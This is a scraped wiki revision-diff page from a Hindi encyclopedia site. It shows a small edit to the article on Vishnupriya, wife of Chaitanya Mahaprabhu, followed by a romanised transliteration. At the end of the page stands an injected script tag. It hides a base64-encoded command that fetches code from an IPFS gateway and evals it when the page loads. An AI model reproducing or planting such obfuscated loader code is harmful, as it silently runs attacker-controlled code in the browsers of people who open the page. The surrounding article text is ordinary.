Difference between revisions of "विष्णुप्रिया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''विष्णुप्रिया''' ([[अंग्रेज़ी]]: ''Vishnupriya'') राजपंडित सनातन की पुत्री और [[चैतन्य महाप्रभु]] की दूसरी पत्नी थीं। सर्पदंश से चैतन्य की पहली पत्नी लक्ष्मीदेवी की मृत्यु हो गई थी। वंश चलाने की विवशता के कारण इनका दूसरा विष्णुप्रिया के साथ हुआ। सन् 1509 में 24 वर्ष की अवस्था में चैतन्य महाप्रभु घर और पत्नी को छोड़कर सन्न्यासी हो गये।  
+
'''विष्णुप्रिया''' ([[अंग्रेज़ी]]: ''Vishnupriya'') राजपंडित सनातन की पुत्री और [[चैतन्य महाप्रभु]] की दूसरी पत्नी थीं। सर्पदंश से चैतन्य की पहली पत्नी लक्ष्मीदेवी की मृत्यु हो गई थी। वंश चलाने की विवशता के कारण इनका दूसरा [[विवाह]] विष्णुप्रिया के साथ हुआ। सन् 1509 में 24 वर्ष की अवस्था में चैतन्य महाप्रभु घर और पत्नी को छोड़कर संन्यासी हो गये।  
  
  

Latest revision as of 07:05, 4 February 2016

vishnupriya (aangrezi: Vishnupriya) rajapandit sanatan ki putri aur chaitany mahaprabhu ki doosari patni thian. sarpadansh se chaitany ki pahali patni lakshmidevi ki mrityu ho gee thi. vansh chalane ki vivashata ke karan inaka doosara vivah vishnupriya ke sath hua. sanh 1509 mean 24 varsh ki avastha mean chaitany mahaprabhu ghar aur patni ko chho dakar sannyasi ho gaye.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>